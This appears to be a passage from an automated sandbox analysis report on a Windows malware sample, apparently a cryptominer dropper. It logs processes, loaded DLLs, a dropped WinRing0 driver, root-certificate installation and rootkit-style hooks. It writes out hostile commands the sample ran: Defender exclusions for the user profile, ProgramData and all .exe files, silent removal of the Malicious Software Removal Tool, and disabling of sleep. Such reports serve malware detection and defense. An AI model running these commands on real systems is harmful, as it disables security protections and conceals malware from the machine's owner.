          Source: C:\ProgramData\IGaming\driver.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -ForceJump to behavior
          Source: C:\ProgramData\IGaming\driver.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestartJump to behavior
          Source: C:\ProgramData\IGaming\driver.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0Jump to behavior
          Source: C:\ProgramData\IGaming\driver.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0Jump to behavior
          Source: C:\ProgramData\IGaming\driver.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0Jump to behavior
          Source: C:\ProgramData\IGaming\driver.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0Jump to behavior
          Source: C:\ProgramData\IGaming\driver.exeProcess created: C:\Windows\System32\dialer.exe C:\Windows\system32\dialer.exeJump to behavior
          Source: C:\ProgramData\IGaming\driver.exeProcess created: C:\Windows\System32\dialer.exe C:\Windows\system32\dialer.exeJump to behavior
          Source: C:\ProgramData\IGaming\driver.exeProcess created: C:\Windows\System32\dialer.exe dialer.exeJump to behavior
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wusa.exe wusa /uninstall /kb:890830 /quiet /norestart
          Source: C:\Users\user\Desktop\file.exeSection loaded: apphelp.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
          Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
          Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
          Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
          Source: C:\Windows\System32\powercfg.exeSection loaded: umpdc.dllJump to behavior
          Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
          Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
          Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
          Source: C:\Windows\System32\powercfg.exeSection loaded: umpdc.dllJump to behavior
          Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
          Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
          Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
          Source: C:\Windows\System32\powercfg.exeSection loaded: umpdc.dllJump to behavior
          Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
          Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
          Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
          Source: C:\Windows\System32\powercfg.exeSection loaded: umpdc.dllJump to behavior
          Source: C:\Windows\System32\dialer.exeSection loaded: ntmarta.dllJump to behavior
          Source: C:\Windows\System32\wusa.exeSection loaded: dpx.dllJump to behavior
          Source: C:\Windows\System32\wusa.exeSection loaded: wtsapi32.dllJump to behavior
          Source: C:\Windows\System32\wusa.exeSection loaded: cryptsp.dllJump to behavior
          Source: C:\Windows\System32\wusa.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Windows\System32\wusa.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\ProgramData\IGaming\driver.exeSection loaded: apphelp.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
          Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
          Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
          Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
          Source: C:\Windows\System32\powercfg.exeSection loaded: umpdc.dllJump to behavior
          Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
          Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
          Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
          Source: C:\Windows\System32\powercfg.exeSection loaded: umpdc.dllJump to behavior
          Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
          Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
          Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
          Source: C:\Windows\System32\powercfg.exeSection loaded: umpdc.dllJump to behavior
          Source: C:\Windows\System32\wusa.exeSection loaded: dpx.dllJump to behavior
          Source: C:\Windows\System32\wusa.exeSection loaded: wtsapi32.dllJump to behavior
          Source: C:\Windows\System32\wusa.exeSection loaded: cryptsp.dllJump to behavior
          Source: C:\Windows\System32\wusa.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dll
          Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dll
          Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dll
          Source: C:\Windows\System32\powercfg.exeSection loaded: umpdc.dll
          Source: C:\Windows\System32\dialer.exeSection loaded: ntmarta.dll
          Source: C:\Windows\System32\dialer.exeSection loaded: iphlpapi.dll
          Source: C:\Windows\System32\dialer.exeSection loaded: userenv.dll
          Source: C:\Windows\System32\dialer.exeSection loaded: cryptbase.dll
          Source: C:\Windows\System32\dialer.exeSection loaded: cryptsp.dll
          Source: C:\Windows\System32\dialer.exeSection loaded: rsaenh.dll
          Source: C:\Windows\System32\dialer.exeSection loaded: sspicli.dll
          Source: C:\Windows\System32\dialer.exeSection loaded: powrprof.dll
          Source: C:\Windows\System32\dialer.exeSection loaded: umpdc.dll
          Source: C:\Windows\System32\dialer.exeSection loaded: mswsock.dll
          Source: C:\Windows\System32\dialer.exeSection loaded: dhcpcsvc6.dll
          Source: C:\Windows\System32\dialer.exeSection loaded: dhcpcsvc.dll
          Source: C:\Windows\System32\dialer.exeSection loaded: dnsapi.dll
          Source: C:\Windows\System32\dialer.exeSection loaded: napinsp.dll
          Source: C:\Windows\System32\dialer.exeSection loaded: pnrpnsp.dll
          Source: C:\Windows\System32\dialer.exeSection loaded: wshbth.dll
          Source: C:\Windows\System32\dialer.exeSection loaded: nlaapi.dll
          Source: C:\Windows\System32\dialer.exeSection loaded: winrnr.dll
          Source: C:\Windows\System32\dialer.exeSection loaded: kernel.appcore.dll
          Source: C:\Windows\System32\dialer.exeSection loaded: rasadhlp.dll
          Source: C:\Windows\System32\dialer.exeSection loaded: fwpuclnt.dll
          Source: C:\Windows\System32\dialer.exeSection loaded: wbemcomn.dll
          Source: C:\Windows\System32\dialer.exeSection loaded: amsi.dll
          Source: C:\Windows\System32\dialer.exeSection loaded: profapi.dll
          Source: C:\Windows\System32\dialer.exeSection loaded: wbemcomn.dll
          Source: C:\Windows\System32\dialer.exeSection loaded: wbemcomn.dll
          Source: C:\Windows\System32\dialer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
          Source: file.exeStatic PE information: Image base 0x140000000 > 0x60000000
          Source: file.exeStatic file information: File size 2867712 > 1048576
          Source: file.exeStatic PE information: Raw size of .data is bigger than: 0x100000 < 0x2b1e00
          Source: file.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
          Source: Binary string: @\??\C:\Users\user\AppData\Local\Temp\wct42C5.tmp.pdb source: svchost.exe, 00000033.00000002.3369152171.0000024B8765A000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000033.00000000.2173615180.0000024B8765A000.00000004.00000001.00020000.00000000.sdmp
          Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831 source: svchost.exe, 00000033.00000000.2173514506.0000024B8764A000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000033.00000002.3368381949.0000024B8764A000.00000004.00000001.00020000.00000000.sdmp
          Source: Binary string: $@\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2 source: svchost.exe, 00000033.00000002.3369152171.0000024B8765A000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000033.00000000.2173615180.0000024B8765A000.00000004.00000001.00020000.00000000.sdmp
          Source: Binary string: .@\??\C:\Users\user\AppData\Local\Temp\wct4B1.tmpp.pdb source: svchost.exe, 00000033.00000000.2173514506.0000024B87641000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000033.00000002.3368381949.0000024B87641000.00000004.00000001.00020000.00000000.sdmp
          Source: Binary string: ,@\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb source: svchost.exe, 00000033.00000002.3369152171.0000024B8765A000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000033.00000000.2173615180.0000024B8765A000.00000004.00000001.00020000.00000000.sdmp
          Source: Binary string: "@\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb source: svchost.exe, 00000033.00000002.3369152171.0000024B8765A000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000033.00000000.2173615180.0000024B8765A000.00000004.00000001.00020000.00000000.sdmp
          Source: Binary string: ,@\??\C:\Users\user\AppData\Local\Temp\wct42C5.tmp.pdb source: svchost.exe, 00000033.00000000.2173514506.0000024B87641000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000033.00000002.3368381949.0000024B87641000.00000004.00000001.00020000.00000000.sdmp
          Source: Binary string: +@\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: svchost.exe, 00000033.00000000.2173436542.0000024B8762B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000033.00000002.3367839566.0000024B8762B000.00000004.00000001.00020000.00000000.sdmp
          Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: svchost.exe, 00000033.00000000.2173514506.0000024B8764A000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000033.00000002.3368381949.0000024B8764A000.00000004.00000001.00020000.00000000.sdmp
          Source: Binary string: (@\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb source: svchost.exe, 00000033.00000002.3369152171.0000024B8765A000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000033.00000000.2173615180.0000024B8765A000.00000004.00000001.00020000.00000000.sdmp
          Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: svchost.exe, 00000033.00000000.2173514506.0000024B8764A000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000033.00000002.3368381949.0000024B8764A000.00000004.00000001.00020000.00000000.sdmp
          Source: Binary string: &@\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2 source: svchost.exe, 00000033.00000002.3369152171.0000024B8765A000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000033.00000000.2173615180.0000024B8765A000.00000004.00000001.00020000.00000000.sdmp
          Source: Binary string: d:\hotproject\winring0\source\dll\sys\lib\amd64\WinRing0.pdb source: driver.exe, 0000001A.00000003.2145145649.000001F307E70000.00000004.00000001.00020000.00000000.sdmp, ftnvuqwjtdwb.sys.26.dr
          Source: Binary string: @\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.errorb source: svchost.exe, 00000033.00000000.2173436542.0000024B8762B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000033.00000002.3367839566.0000024B8762B000.00000004.00000001.00020000.00000000.sdmp
          Source: Binary string: @\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb* source: svchost.exe, 00000033.00000002.3369152171.0000024B8765A000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000033.00000000.2173615180.0000024B8765A000.00000004.00000001.00020000.00000000.sdmp
          Source: Binary string: @\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: svchost.exe, 00000033.00000000.2173436542.0000024B8762B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000033.00000002.3367839566.0000024B8762B000.00000004.00000001.00020000.00000000.sdmp
          Source: Binary string: ~1.PDB @ source: svchost.exe, 00000033.00000000.2173514506.0000024B8764A000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000033.00000002.3368381949.0000024B8764A000.00000004.00000001.00020000.00000000.sdmp
          Source: Binary string: @\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: svchost.exe, 00000033.00000000.2173436542.0000024B8762B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000033.00000002.3367839566.0000024B8762B000.00000004.00000001.00020000.00000000.sdmp
          Source: Binary string: ,@\??\C:\Users\user\AppData\Local\Temp\wct4B1.tmpp.pdb source: svchost.exe, 00000033.00000002.3369152171.0000024B8765A000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000033.00000000.2173615180.0000024B8765A000.00000004.00000001.00020000.00000000.sdmp
          Source: C:\Windows\System32\dialer.exeCode function: 45_2_00000001408460F0 LoadLibraryA,GetProcAddressForCaller,ExitProcess,VirtualProtect,VirtualProtect,VirtualProtect,45_2_00000001408460F0
          Source: file.exeStatic PE information: section name: .00cfg
          Source: driver.exe.0.drStatic PE information: section name: .00cfg
          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF749F41394 push qword ptr [00007FF749F4B004h]; ret 0_2_00007FF749F41403
          Source: C:\Windows\System32\winlogon.exeCode function: 21_2_000001E85896ACDD push rcx; retf 003Fh21_2_000001E85896ACDE
          Source: C:\Windows\System32\winlogon.exeCode function: 21_2_000001E85899C6DD push rcx; retf 003Fh21_2_000001E85899C6DE
          Source: C:\Windows\System32\winlogon.exeCode function: 21_2_000001E8589CACDD push rcx; retf 003Fh21_2_000001E8589CACDE
          Source: C:\ProgramData\IGaming\driver.exeCode function: 26_2_00007FF7F4F21394 push qword ptr [00007FF7F4F2B004h]; ret 26_2_00007FF7F4F21403
          Source: C:\Windows\System32\lsass.exeCode function: 27_2_00000140ADFDACDD push rcx; retf 003Fh27_2_00000140ADFDACDE
          Source: C:\Windows\System32\lsass.exeCode function: 27_2_00000140AE87C6DD push rcx; retf 003Fh27_2_00000140AE87C6DE
          Source: C:\Windows\System32\svchost.exeCode function: 30_2_00000195DD5AACDD push rcx; retf 003Fh30_2_00000195DD5AACDE
          Source: C:\Windows\System32\svchost.exeCode function: 30_2_00000195DD5DC6DD push rcx; retf 003Fh30_2_00000195DD5DC6DE
          Source: C:\Windows\System32\dwm.exeCode function: 31_2_000001160C9FACDD push rcx; retf 003Fh31_2_000001160C9FACDE
          Source: C:\Windows\System32\dwm.exeCode function: 31_2_000001160CA2C6DD push rcx; retf 003Fh31_2_000001160CA2C6DE
          Source: C:\Windows\System32\dialer.exeCode function: 44_2_0000000140001394 push qword ptr [0000000140008004h]; ret 44_2_0000000140001403
          Source: C:\Windows\System32\svchost.exeCode function: 46_2_00000257E108ACDD push rcx; retf 003Fh46_2_00000257E108ACDE
          Source: C:\Windows\System32\svchost.exeCode function: 46_2_00000257E10BC6DD push rcx; retf 003Fh46_2_00000257E10BC6DE
          Source: C:\Windows\System32\svchost.exeCode function: 47_2_000001F28C1EACDD push rcx; retf 003Fh47_2_000001F28C1EACDE
          Source: C:\Windows\System32\svchost.exeCode function: 47_2_000001F28C94C6DD push rcx; retf 003Fh47_2_000001F28C94C6DE
          Source: C:\Windows\System32\svchost.exeCode function: 48_2_000001CA97FEACDD push rcx; retf 003Fh48_2_000001CA97FEACDE
          Source: C:\Windows\System32\svchost.exeCode function: 48_2_000001CA9855C6DD push rcx; retf 003Fh48_2_000001CA9855C6DE
          Source: C:\Windows\System32\svchost.exeCode function: 49_2_000001D2652FACDD push rcx; retf 003Fh49_2_000001D2652FACDE
          Source: C:\Windows\System32\svchost.exeCode function: 49_2_000001D26532C6DD push rcx; retf 003Fh49_2_000001D26532C6DE
          Source: C:\Windows\System32\svchost.exeCode function: 50_2_00000254A27EC6DD push rcx; retf 003Fh50_2_00000254A27EC6DE
          Source: C:\Windows\System32\svchost.exeCode function: 51_2_0000024B87DEC6DD push rcx; retf 003Fh51_2_0000024B87DEC6DE
          Source: C:\Windows\System32\svchost.exeCode function: 52_2_00000205FB3DACDD push rcx; retf 003Fh52_2_00000205FB3DACDE
          Source: C:\Windows\System32\svchost.exeCode function: 52_2_00000205FD41C6DD push rcx; retf 003Fh52_2_00000205FD41C6DE
          Source: C:\Windows\System32\svchost.exeCode function: 53_2_000001A2056BC6DD push rcx; retf 003Fh53_2_000001A2056BC6DE
          Source: C:\Windows\System32\svchost.exeCode function: 54_2_0000018EC1F4ACDD push rcx; retf 003Fh54_2_0000018EC1F4ACDE
          Source: C:\Windows\System32\svchost.exeCode function: 54_2_0000018EC1F7C6DD push rcx; retf 003Fh54_2_0000018EC1F7C6DE
          Source: C:\Windows\System32\svchost.exeCode function: 55_2_0000025CE3BDACDD push rcx; retf 003Fh55_2_0000025CE3BDACDE
          Source: C:\Windows\System32\svchost.exeCode function: 55_2_0000025CE3E1C6DD push rcx; retf 003Fh55_2_0000025CE3E1C6DE
          Source: C:\Windows\System32\svchost.exeCode function: 56_2_000002623896ACDD push rcx; retf 003Fh56_2_000002623896ACDE
          Source: C:\Windows\System32\svchost.exeCode function: 56_2_000002623899C6DD push rcx; retf 003Fh56_2_000002623899C6DE

          Persistence and Installation Behavior

          barindex
          Installs new ROOT certificates
          Source: C:\Windows\System32\lsass.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 BlobJump to behavior
          Source: C:\Windows\System32\lsass.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 BlobJump to behavior
          Sample is not signed and drops a device driver
          Source: C:\ProgramData\IGaming\driver.exeFile created: C:\Windows\TEMP\ftnvuqwjtdwb.sysJump to behavior
          Source: C:\ProgramData\IGaming\driver.exeFile created: C:\Windows\Temp\ftnvuqwjtdwb.sysJump to dropped file
          Source: C:\Users\user\Desktop\file.exeFile created: C:\ProgramData\IGaming\driver.exeJump to dropped file
          Source: C:\Users\user\Desktop\file.exeFile created: C:\ProgramData\IGaming\driver.exeJump to dropped file
          Source: C:\ProgramData\IGaming\driver.exeFile created: C:\Windows\Temp\ftnvuqwjtdwb.sysJump to dropped file
          Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe delete "LightService"

          Hooking and other Techniques for Hiding and Protection

          barindex
          Hooks files or directories query functions (used to hide files and directories)
          Source: winlogon.exeIAT, EAT, inline or SSDT hook detected: function: NtQueryDirectoryFile
          Hooks processes query functions (used to hide processes)
          Source: winlogon.exeIAT, EAT, inline or SSDT hook detected: function: NtQuerySystemInformation
          Hooks registry keys query functions (used to hide registry keys)
          Source: winlogon.exeIAT, EAT, inline or SSDT hook detected: function: ZwEnumerateValueKey
          Loading BitLocker PowerShell Module
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
